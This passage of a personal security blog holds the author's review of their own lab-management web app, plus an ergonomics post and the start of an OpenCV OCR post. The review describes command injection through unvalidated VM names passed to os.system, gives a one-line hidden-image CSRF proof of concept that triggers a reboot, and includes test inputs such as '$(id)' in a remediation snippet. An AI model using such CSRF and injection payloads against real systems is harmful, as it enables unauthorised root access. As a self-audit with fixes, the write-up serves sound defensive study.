<li>Hardcoded password</li>
<li>Use of md5 function (used to generate VNC password, not a vuln)</li>
<li>Binding to all interfaces</li>
<li>Starting a process with shell (using os.system)</li>
<li>Starting a process with shell, with possible injection (it detects when external variables are used)</li>
</ul>
<div>
I also used Python-Taint (<a href="https://github.com/python-security/pyt">https://github.com/python-security/pyt</a>). It found that I was using a URL parameter as an input for SQL queries. </div>
<div>
<br /></div>
<div>
These tools are definitely useful for a larger project. They did find useful things. </div>
<div>
<br /></div>
<div>
I am also doing manual analysis. OWASP has guides on how to do a code review (<a href="https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project">https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project</a>) and I'm using those as well. </div>
<div>
<br /></div>
<div>
Here's what OWASP recommends focusing on:</div>
<div>
<img height="342" src="https://lh6.googleusercontent.com/_WsORS5j4NnFGFT6af9qcq0U-slIKhfObDDDkyiuSy5YppoUC8YwJ5XvueVlPEpDrsVf6HQqaXr7tTxllo36oAO8RMPf3GmWZGr5ivBdgCKeEVJaVOMWqESIghaxNjNeUULMlONz" style="border: none; transform: rotate(0rad);" width="606" /></div>
<div>
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">OWASP also recommends looking at inputs and data flow. They have more things recommended but I wanna try to focus on vulnerability areas the above screenshot mentions and inputs. </span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<ul>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Data Validation: There isn't any. json.loads is used, which only validates that the upload is JSON; that doesn't really matter. To start a lab the JSON structure has to be correct, but the values aren't checked at all (whether something is an int, a string, etc.). The uploaded file isn't saved on disk either. </span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Authentication: Admin has to login to use WebUI or API. api.py has a hardcoded password. </span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Session Management: Basic auth is used, so there isn't any. </span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Authorization: N/A</span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Cryptography: The WebUI/API does not use SSL/TLS, and neither does the NoVNC connection. Anyone eavesdropping on the network could capture the credentials.</span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Error Handling: Yes! I'm using try-except and returning a generic error message; inside the try block I'm also doing if checks that return a generic message. It's not perfect; there are some flaws. </span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Logging: None</span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Security Configuration: N/A</span></span></li>
<li><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Network Architecture: The web app does bind to all interfaces. </span></span></li>
</ul>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">As for inputs, only admin has input capabilities. They can upload JSON file, reboot VM's, and change VM VNC password. </span></span></div>
</div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">For JSON file, POST request is used. (<a href="https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L46">https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L46</a>)</span></span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;"> For rebooting VM's or changing VNC password, GET request is used with VM name in the URL. (</span><span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><a href="https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L147">https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L147</a> <a href="https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L132">https://github.com/BoredHackerBlog/runthelabs/blob/master/app/api.py#L132</a>)</span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here's the example config file:</span></span></div>
<div>
<img height="409" src="https://lh5.googleusercontent.com/KdD_g69nhZJj76xWKVwFQP3_ifXgc9mfnFUhYCyjCeF_ZBj48AqEBLQKFtfg8lCuxHjUxqSRUg9rAuenZAaYEJTz0hff6B42gddjlonBvypX4kEnO7fU01WyCgQhJpMJFU9exB40" style="border: none; transform: rotate(0rad);" width="624" /></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">The JSON file upload is done through /upload, and the file is assigned to the labconfig variable. When the lab is turned on (through /on), startlab() is called, which creates a DB and calls mmstart.startmm(labconfig). startmm calls mmcontrol.start_mm(), which starts Minimega. After that, the JSON is processed: gre first, then dhcp, then internet, and finally the VMs. For each VM, mmcontrol.vm_config ends up being called, which runs an os.system statement with the networking info. </span></span><span style="font-family: "arial"; font-size: 14.6667px; white-space: pre-wrap;">With JSON processing, there are several places a command could be injected. </span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">For VM reboot, here's what ends up being run when vmname is supplied via a GET request:</span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">mmcontrol.vm_reboot(vmname, dbcontrol.get_password(vmname)), and in vm_reboot() this statement is executed first: os.system(minimega_cmd + "vm kill " + vm_name). Injection can happen here.</span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span></div>
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">For VM VNC password reset, mmcontrol.set_password() is used, which executes os.system(minimega_cmd + "vm qmp " + vm_name + " " + json.dumps(vncpwcmd)) first. In this case, the injection could occur in the middle of the statement.</span></span></div>
<br />
<b>Dynamic Analysis:</b><br />
For dynamic analysis, the application has to be running. I used OWASP ZAP, Subgraph Vega, and Nikto. They didn't actually find anything useful, which was expected; however, Nikto did guess the hardcoded admin/admin login.<br />
<br />
I started doing manual analysis. I would use Burp but it really isn't needed for now.<br />
<br />
First, I uploaded a random file, which didn't do anything. I uploaded a random JSON file, and it was accepted. The lab obviously won't start since it's not a valid config file. After that, I took the example config file and injected commands. Here's what the new file looks like:<br />
<span id="docs-internal-guid-13f6ad77-7fff-a1ff-0b5c-163fcaabca5b"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="299" src="https://lh5.googleusercontent.com/i4y-p81ElX__55BO8m8Wl_ESWw0rr5z5SK-bQ-LrdLwUd8BssTFQGXN_8DYLJ8ajxIXdWfOJ6vZ5-fd1cPkbP35R6vknlM5GAB6YV90hnfMyN_ITuJWoO1X2-P8TgqwgwdWTHTIK" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span><br />
<br />
The command injection worked:<br />
<span id="docs-internal-guid-84bf83d7-7fff-f494-2972-850f40b46914"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="55" src="https://lh6.googleusercontent.com/-yL4MlgY5Xmsvhs-4aSIJ1UmIXG6XBbSJ2kHq0tKVNq-DAwEpme6S6t4082owhQr_FHSLdetsXzRDxPgw0lAl5_TEoChM9wgH1lXiVZyOxYzeq8Hn1wlIceNdvIT27xNeQwDKXDA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">After this, I uploaded the included example JSON configuration and started the lab the normal way so I could try messing with the GET parameters. </span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">First the reboot:</span><br />
<img height="49" src="https://lh3.googleusercontent.com/6QD2evIoV41F20chNeR0ZFS-DYYAQvL-3gSRCIL_UWnubZs1OaCTM7OCmuzOAkjuy1uDSXUUAk1MN46YJUUSEhWSXlp_bILvS-q_RzcbitoV1wF1XMFOE4I97p7kI6dZzrD2RYc5" style="border: none; font-family: Arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre-wrap;" width="336" /><br />
<br />
It worked:<br />
<img height="75" src="https://lh6.googleusercontent.com/rKfu4iQbrvKJIg-uO9GM-BG8mBV7SBuB1DHpSz-rDwHwQXPzPMy8UZjHldqQPAOyNnTXBHZ6tsS2UDaf1Mt-imS6rKLHFMVuRdgQe8GGW4UeMrd21xgWsvHn1N-XOYdQMnUcjASg" style="border: none; transform: rotate(0rad);" width="624" /><br />
<br />
Next, the VNC password reset:<br />
<img height="53" src="https://lh3.googleusercontent.com/w4ptQoMdWbvw2SA3Fn89GswEQ3hILX7jNxwlG3agC3KoF-e186KOS9NS506ceImQu9ruxPap656P92bnIqfS-CvOs8F9jmIxVcmBJKpm94MzKOYc2Mbfk4gO0LvLH4G63AppRMdA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="388" /><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">That also worked:</span><br />
<span id="docs-internal-guid-223c20cf-7fff-1943-3da9-e7fcac2e3002"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="41" src="https://lh4.googleusercontent.com/J5dNG8QpbQEsdBODYnjaO8Nz49L9jPB0mullgT_sT8_ejznRHaa5BbnROl0XUTWm1nZTkPdX6UTVBZQNpG2zQaJOrxNmpGY0F6KAu-rninhW6U88S0mpIaaRMUXwtzaj5nLSXtCu" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Another issue with this software is cross-site request forgery. Since I'm not using session management or any other security, when a request is made via another webpage, if the admin is logged in, the request will get processed.</span></span><br />
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span> <span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">For example, &lt;img src="http://10.0.0.53:1337/reboot/tc2" width="0" height="0" border="0"&gt; embedded in another HTML page does cause a reboot of tc2. Of course, since I wasn't checking whether the VM name is valid, the attacker does not need to know a VM name to execute commands.</span></span><br />
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span> <span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Here's my new code; the asdf VM doesn't exist:</span></span><br />
<span id="docs-internal-guid-fd0dd3ac-7fff-365c-3634-5031015461ec"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="115" src="https://lh3.googleusercontent.com/ounx6c10Mcgs5q_ctknjDULWaUtgmwUyRug1e93S6PMR0m4xtd5VGt6mT38IT4EeZtgeIqoC4g6usyesZZTfQMrmN0Rhm9FrmcYACQYgbqwkEuU1F-C55I565ZTnkXVvEfbfOAPP" style="border: none; transform: rotate(0rad);" width="593" /></span></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span> <span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">I logged into the admin account on another machine and opened the poc webpage:</span></span><br />
<span id="docs-internal-guid-1b53ea7c-7fff-0d59-9e0e-1476e98dd5a6"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img height="201" src="https://lh3.googleusercontent.com/lrmMZMCLCkrTgWHX_Ry0MiTFxIcDXHPvPIAVZ4PEWLdmx9yrWablTJL8JVTJ4E9FJNk14AuAf67DZPR5EP9mhhpbdd42C6WWql-WKLOVUuAXWXWjQM8ek0Ll0J4wtIJ7qJ0HDTGj" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="490" /></span></span><br />
<span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">On my "hacker" machine:</span><br />
<img height="377" src="https://lh5.googleusercontent.com/NR_ohm_l0z1HcJrpqTmKkJyO8_iMBPwaXYsp-b2o9Sw56V6l6WqZ7fDAnlW2bMnFrqvSXABx6TWib_RvjU98_t4gsRGeR7yqoCpRcZVdoPv08pYLOs_cVW0dRVn9CvE50p6EW_QY" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /><br />
<br />
Dynamic analysis helps with confirming/validating some of the findings in static analysis.<br />
<br />
<b>Findings:</b><br />
<br />
<ol>
<li>Binding to all network interfaces</li>
<ol>
<li>This is bad because depending on the network configuration, the webui can be accessed from inside the VM</li>
</ol>
<li>Command injection</li>
<ol>
<li>Bad but only admin can do it (unless CSRF is used)</li>
</ol>
<li>Lack of data validation</li>
<ol>
<li>I should have validated everything in the JSON file and even the data from GET requests. For example, if a vmname is supplied for a reboot, I should check whether that VM actually exists. I should also make sure that I only allow a-z, A-Z, 0-9 as input characters. </li>
</ol>
<li>Bad session management</li>
<ol>
<li>I probably shouldn't have used basic auth. Flask (or modules on top of Flask) has session management mechanisms that I could have used. CSRF token should be used. There are other web app protections that could be used as well.</li>
</ol>
<li>Cross-site request forgery</li>
<ol>
<li>CSRF token should be used. </li>
</ol>
<li>Lack of cryptography</li>
<ol>
<li>The way I imagined this web app would be used didn't require adding ssl/tls protection but it's still something I wanted to point out.</li>
</ol>
<li>Error handling could be better</li>
<ol>
<li>Error messages are generic; more detailed messages would be useful. Also, more error checking should be done. For example, if someone starts a lab with a bad JSON file, the code still starts the minimega binary. That should not happen. The return value of os.system should be checked too.</li>
</ol>
<li>Lack of logging</li>
<ol>
<li>I should have been logging some stuff, mainly errors. </li>
</ol>
</ol>
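<div>As an added example (this is not code from runthelabs or from this post), here is what the three remediations above look like in plain Python: an allowlist validator for vmname that also checks the VM exists, a subprocess wrapper that replaces os.system, never hands the string to a shell and fails on a non-zero exit status, and a per-session CSRF token compared in constant time. The <code>vmctl reboot &lt;name&gt;</code> command is a placeholder for whatever minimega invocation the real app uses; in Flask the token would live in <code>session</code> and be checked on every POST (Flask-WTF's CSRFProtect does exactly this).</div>

```python
import hmac
import re
import secrets
import subprocess
import sys
from typing import Iterable, List

# Allowlist from the findings above: only a-z, A-Z and 0-9 may appear in a VM name.
# fullmatch() is used instead of match() with "$" so a trailing newline cannot slip through.
VMNAME_RE = re.compile(r"[A-Za-z0-9]+")


def validate_vmname(vmname, known_vms: Iterable[str]) -> str:
    """Reject anything that is not a plain alphanumeric name of a VM we know about.
    The validated value is returned so callers use only the checked name afterwards."""
    if not isinstance(vmname, str) or not VMNAME_RE.fullmatch(vmname):
        raise ValueError("vmname must match [A-Za-z0-9]+")
    if vmname not in set(known_vms):
        raise ValueError("unknown vm: %s" % vmname)
    return vmname


def is_valid_vmname(vmname, known_vms: Iterable[str]) -> bool:
    """Boolean wrapper around validate_vmname for callers that just want yes/no."""
    try:
        validate_vmname(vmname, known_vms)
        return True
    except ValueError:
        return False


def reboot_vm_command(vmname: str, known_vms: Iterable[str]) -> List[str]:
    """Build the argv for a reboot. 'vmctl reboot <name>' is a placeholder
    (assumption) for whatever minimega invocation the real app uses."""
    return ["vmctl", "reboot", validate_vmname(vmname, known_vms)]


def run_checked(argv: List[str]) -> subprocess.CompletedProcess:
    """Run a command as an argv list: no shell, so ';', '&&' or '$(...)' inside an
    argument are just characters, and a non-zero exit raises instead of being
    silently ignored the way an unchecked os.system() return value is."""
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True)
    if proc.returncode != 0:
        raise RuntimeError("%r failed with status %d: %s"
                           % (argv[0], proc.returncode, proc.stderr.strip()))
    return proc


def exit_status_is_accepted(code: int) -> bool:
    """Demo helper: run a child that exits with `code` through run_checked.
    Uses the current interpreter so it works on any platform."""
    try:
        run_checked([sys.executable, "-c", "import sys; sys.exit(%d)" % code])
        return True
    except RuntimeError:
        return False


# CSRF: one random token per session, compared in constant time on every
# state-changing request (with Flask you would keep it in `session`).
def new_csrf_token() -> str:
    return secrets.token_urlsafe(32)


def csrf_ok(session_token: str, submitted: str) -> bool:
    if not session_token or not submitted:
        return False
    return hmac.compare_digest(session_token, submitted)


if __name__ == "__main__":
    vms = ["lab01", "lab02"]  # constructed list of VMs the lab config knows about
    print(reboot_vm_command("lab01", vms))
    for bad in ("lab01; id", "lab01 && reboot", "$(id)", "lab99"):
        print("%-18r rejected: %s" % (bad, not is_valid_vmname(bad, vms)))
    print("exit 0 accepted:", exit_status_is_accepted(0),
          "exit 3 accepted:", exit_status_is_accepted(3))
    tok = new_csrf_token()
    print("csrf same:", csrf_ok(tok, tok), "csrf wrong:", csrf_ok(tok, "wrong"))
```

<div>The validator returns the checked name rather than a bool so the only value that ever reaches the command line is the one that passed; the subprocess wrapper covers both the "bad JSON still starts minimega" and the "os.system return is ignored" findings, since a failing prerequisite now raises before the next step runs.</div>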
<div>
Basically, there are three ways to get root on the system running runthelabs. A non-admin user can use CSRF w/ command injection. A malicious admin can use various command injection points. Finally, a MITM attack can be used to capture admin credentials and those could be used to execute a command injection attack.<br />
<br /></div>
<div>
<b>Conclusion:</b></div>
<div>
It's possible that I may have missed something. Static and dynamic analysis both definitely were useful. OWASP is a great resource on code review. Also, this GitHub awesome list is very useful: <a href="https://github.com/mre/awesome-static-analysis">https://github.com/mre/awesome-static-analysis</a></div>
<div>
<br /></div>
<div>
The security issues occurred due to laziness and the risk/chances of exploitation were low. Also, I accepted the risk of possible command injection by the admin when I was programming. The impact is high since you can get root pretty easily with CSRF or if you were a malicious admin. </div>
<br /><b>Computer usage and health</b> (2018-11-05)<br /><b><span style="font-family: Arial, Helvetica, sans-serif;">Introduction:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If you're in infosec or any other computer-focused job such as sysadmin or programmer, you may be spending a lot of time on a computer and/or sitting at a desk all day (or at least more than the average human being). This may come with health problems related to, but not limited to, the hands, eyes, back, and neck. In this post, I'll try to provide tools and tips that may help limit injuries or pain. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Disclaimer: I am not a doctor. This blog post does not provide any cures. Check links in the resources section for more information. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Tools/Tips:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">One of the main things you do when using a computer is stare at your screen. I'm not sure if this affects your vision long-term or not, but it may certainly cause strain or dry eyes. There are applications you can install to remind you to look away or take a break from staring at your screen. These applications include Workrave (http://www.workrave.org/) and Eyeleo (http://eyeleo.com/). There are more if you check AlternativeTo (https://alternativeto.net/). I have used Workrave in the past but currently I use Eyeleo. Depending on your settings, Eyeleo will give you a popup about various eye movements (rolling your eyes, for example) or looking away. Workrave also gives you a popup about doing exercises at your desk. You may have to tune the time settings to make sure the popups don't get too annoying and you can still remain productive. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">You can also adjust your screen brightness level depending on the light level around you. Android phones and tablets usually have an option to adjust brightness based on the sensor included on the phone. Another thing you can do is use a blue light filter option on your devices. Again, Android phones and tablets may include this option in their settings as well. For Windows, I use f.lux (https://justgetflux.com/), which is pretty popular. It will adjust your screen color based on the time of day. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Finally, you can get computer glasses that are designed for computer users. I'm pretty sure they protect your eyes from blue light; besides that, I'm not 100% sure what else is different about them. Additional features or protections may depend on the manufacturer, I guess. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">"Protect Ya Neck" - Wu Tang Clan</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">You may get neck issues depending on how your monitor is positioned/angled. Make sure your monitor is in front of you and you don't have to keep your neck tilted or twisted to view it. Position the monitor so you're not getting glare or reflection. Keep your monitor clean as well. Keep in mind the height and distance of the monitor compared to your eye level. You shouldn't have to bend your neck down to view what's on the screen. Check the resources for more information on setting up your monitor. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Pay attention to your posture when using a computer. Make sure you're not cutting off or reducing blood circulation to your hands because of the way you're using the keyboard. Try to keep your back straight. Keep your forearms and wrists aligned with the keyboard and mouse. Your feet should be flat against the ground. Check the links in the resources for a diagram. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/wfMan8d5240/0.jpg" src="https://www.youtube.com/embed/wfMan8d5240?feature=player_embedded" frameborder="0" allowfullscreen></iframe></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Instead of sitting all day, you can also stand at your desk. Adjustable standing desks exist, and you can also buy kits that convert your desk into an adjustable standing desk. If you do utilize a standing desk, make sure not to stand ALL day; switch between sitting and standing. Also, if you're standing, use an anti-fatigue mat to stand on. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">An ergonomic keyboard and mouse may make your hands more comfortable when using a computer. They can be used with your natural hand position and may help prevent carpal tunnel (not sure how true that is). There are many options out there when it comes to ergonomic keyboards and mice; you may just have to test and find what feels most comfy to you. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Some workplaces may have people in charge of ergonomics/human factor or occupational health. I've worked at a place that has had people like that. They can help make sure your work environment is comfortable and safe. Check with HR. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">That's all! Hopefully, some of the information was useful to whoever is reading this. The links in the resources are probably more helpful.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Resources:</span></b><br />
<a href="http://www.workrave.org/"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.workrave.org/</span></a><br />
<a href="http://eyeleo.com/"><span style="font-family: Arial, Helvetica, sans-serif;">http://eyeleo.com/</span></a><br />
<a href="https://alternativeto.net/software/eyeleo/"><span style="font-family: Arial, Helvetica, sans-serif;">https://alternativeto.net/software/eyeleo/</span></a><br />
<a href="https://alternativeto.net/software/workrave/"><span style="font-family: Arial, Helvetica, sans-serif;">https://alternativeto.net/software/workrave/</span></a><br />
<a href="https://justgetflux.com/"><span style="font-family: Arial, Helvetica, sans-serif;">https://justgetflux.com/</span></a><br />
<a href="https://www.digitaltrends.com/mobile/how-to-use-blue-light-filter-phone/"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.digitaltrends.com/mobile/how-to-use-blue-light-filter-phone/</span></a><br />
<a href="https://ergo-plus.com/office-ergonomics-position-computer-monitor/"><span style="font-family: Arial, Helvetica, sans-serif;">https://ergo-plus.com/office-ergonomics-position-computer-monitor/</span></a><br />
<a href="https://www.ccohs.ca/oshanswers/ergonomics/office/monitor_positioning.html"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.ccohs.ca/oshanswers/ergonomics/office/monitor_positioning.html</span></a><br />
<a href="https://www.spineuniverse.com/wellness/ergonomics/workstation-ergonomic-tips-computer-monitors-posture"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.spineuniverse.com/wellness/ergonomics/workstation-ergonomic-tips-computer-monitors-posture</span></a><br />
<a href="http://www.healthycomputing.com/office/setup/monitor/"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.healthycomputing.com/office/setup/monitor/</span></a><br />
<a href="https://lifesworkpt.com/2018/03/proper-computer-posture/"><span style="font-family: Arial, Helvetica, sans-serif;">https://lifesworkpt.com/2018/03/proper-computer-posture/</span></a><br />
<a href="https://www.wikihow.com/Sit-at-a-Computer"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.wikihow.com/Sit-at-a-Computer</span></a><br />
<a href="http://ergonomictrends.com/proper-sitting-posture-computer-experts/"><span style="font-family: Arial, Helvetica, sans-serif;">http://ergonomictrends.com/proper-sitting-posture-computer-experts/</span></a><br />
<a href="https://www.mayoclinic.org/healthy-lifestyle/adult-health/in-depth/standing-workstation/art-20088544"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.mayoclinic.org/healthy-lifestyle/adult-health/in-depth/standing-workstation/art-20088544</span></a><br />
<a href="https://www.uclahealth.org/safety/sitting-to-standing-workstations"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.uclahealth.org/safety/sitting-to-standing-workstations</span></a><br />
<a href="https://www.doityourself.com/stry/choosing-the-best-ergonomic-keyboard-five--essential-features"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.doityourself.com/stry/choosing-the-best-ergonomic-keyboard-five--essential-features</span></a><br />
<br /><b>Extracting winner info from gameplay video with OpenCV and Tesseract OCR</b> (2018-06-01)<br /><span style="font-family: Arial, Helvetica, sans-serif;">A long time ago, while I was on YouTube, I came across a video of Trials Fusion gameplay on a channel named "CaptainSparklez." In this video, two players are playing Trials Fusion to win. There is a playlist full of videos of CaptainSparklez and NFEN playing Trials Fusion. I thought it would be cool to see if I could use OpenCV and OCR to figure out who won which maps, or at least who won a map. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Typically, the winner information is presented as shown below:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span id="docs-internal-guid-30fdca2d-be16-7d14-1e52-6d3e138f69b2"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><img height="344" src="https://lh4.googleusercontent.com/jNL4Zn7NMhuVI6l4dC12EBnuMg-pxjaGIqhiNvPPEP2V43EiEhc4TdamJIw5VkY1dEKkdrxnD2DpSZk12xLSD7AYIPzlh_Toe7TZb9dIrWHgwSlHttKBMdUlYV8F7MBirDWWh0oo" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span></span><br />
<span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">(from video: </span></span><span style="white-space: pre-wrap;">https://www.youtube.com/watch?v=W528UyfC42k)</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">As you can see in the screenshot above, there is a specific area where map and winner information is presented. To extract that specific information, I used Python, OpenCV, and Tesseract OCR. OpenCV will allow me to process the videos and Tesseract OCR will be able to extract the information for me.</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">OpenCV allows you to view a file frame by frame and the code example is shown here: https://docs.opencv.org/3.0-beta/doc/py_tutorials/py_gui/py_video_display/py_video_display.html#playing-video-from-file</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Here's what it looks like when I process the video:</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span id="docs-internal-guid-3e9e8bce-be20-b6a2-7f75-2305fe78b7a6"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><img height="421" src="https://lh6.googleusercontent.com/tvsLbmQ2RgSy88YN1Jq8hGQVCYGEmFGQoExSyBIgyc0rkzJ8RtNkFlNyl0YQ27AcUgMlsaefxDxNC_zKYTwNWhEYi8LUqXnMxHyXg5UvrPhaNaZkCMovP3hsc2Im7dO3ou4R2nd8" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span></span><br />
<span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></span>
